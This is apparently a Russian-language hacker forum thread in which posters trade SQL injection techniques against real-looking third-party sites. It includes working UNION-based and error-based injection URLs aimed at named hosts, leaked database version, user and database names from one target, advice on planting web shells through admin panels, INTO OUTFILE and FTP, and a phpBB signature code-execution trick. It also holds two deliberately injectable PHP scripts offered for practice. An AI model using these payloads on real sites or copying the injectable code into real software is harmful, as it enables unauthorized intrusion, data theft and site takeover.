http://194.28.132.13/index.php?option=com_aardvertiser&task=view&cat_name=Equipment'+and+1=0+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20%23
Кто-нибудь заливал шелл в форуме wowbb через админку? Есть возможность restore bd и выполнить sql команды! у кого есть опыт можете подсказать?
Чета не догнал я, как тут крутить, казалось бы, SQLi с выводом ошибок. http://injoyv[GOOGLE fuck]ideos.com/product.php?proid=85' Делал GROUP+BY'ем, ну выдавил, что 3 колонки, оно не подошло, ладно, думаю, пофиг, стал нянчить SELECT'ом и вот до чего дошел: Code: UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 При этом значении выдает не несоответствие числа колонок, а другое: Причем при подстановке +--+ в конец ситуация меняется. Че это и как быть дальше???
дело в том что просто знаний не хватает))) хотел по примеру залить как на phpbb Code: UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo()' WHERE user_id=2; но не могу понять вот это Code: user_sig_bbcode_uid='(.+)/e\0'
колонок 3 как ты и сказал...но вывода нет.. а кто сказал что должен быть вывод? крути как слепую.. version: 4.1.20 user: injoyuser@localhost database:injoydb табла admin, user есть..дальше сам..и впредь убирай ядовитые цвета из постов..глаза болят..
http://injoyvideos.com/product.php?proid=-85%20or%201%20group%20by%20concat((select%20version()),floor(rand(0)*2))%20having%20min(0)%20or%201%20--%201 Надеюсь ты знаешь, где именно пробелы убрать?
http://www.wowbb.com/admin_demo/admin.php?advanced=3 вот в такой админке можно как то залить или нет?
Пытаюсь залить шелл через into outfile, файл в директории создается, он он пустой пробывал поразному select '123' into outfile '/a/a.txt' и через terminated by, результат все тотже - файл заливается но он пустой. есть идеи в чем может быть проблема?
Здравствуйте. Дайте пожалуйсто пример исходного кода скрипта, где есть традиционая блинд sql инъекция. Если нет, тонаьросате пожалуйсто. Надо обучиться в дом.условиях
PHP: <?php $connect = mysql_connect ('localhost','root','') or die (mysql_errno().':'.mysql_error()); $query = mysql_query ("SELECT * FROM `test`.`practice` WHERE id = ' ".$_GET['id']." ' ") or die (mysql_errno().':'.mysql_error()); if($row = mysql_fetch_array($query)) echo 'TRUE'; else echo 'FALSE'; ?>
PHP: <? /* CREATE DATABASE `test` ; CREATE TABLE `test`.`news` ( `news_id` INT NOT NULL AUTO_INCREMENT PRIMARY KEY , `title` VARCHAR( 255 ) NOT NULL , `content` TEXT NOT NULL ) ENGINE = MYISAM ; INSERT INTO `test`.`news` (`news_id` ,`title` ,`content`) VALUES ( NULL , 'title1', 'content1 content1 content1 content1 content1' ); INSERT INTO `test`.`news` ( `news_id` , `title` , `content` ) VALUES ( NULL , 'title2', 'content2 content2 content2 content2 content2'); */ mysql_connect('localhost','root',''); mysql_select_db('test'); $res=mysql_query('select * from news where news_id ='.$_GET[id]); if ($res) {echo "ok!";} else {echo "error!";} ?>
захожу на сайт: ftp://xxxxxxxxxx.se там 2 файла: .bashrc .bash_profile в которых ничего особенного нет, выше не поднимается, других файлов и папок нет создаю папку с правами 777, шелл заливается ftp://xxxxxxxxxx.se/1/test.php не выполняется открывается как текстовый файл http://xxxxxxxxx.se/1/test.php нет такого файла Есть ли тут возможность заливки шелла?
На сайте есть скуль, через order by смотрю сколько полей их 3! Через union+select подставляю 1,2,3-- выдает такой вот текст: Query failed: The used SELECT statements have a different number of columns как такое может быть и как это обойти?
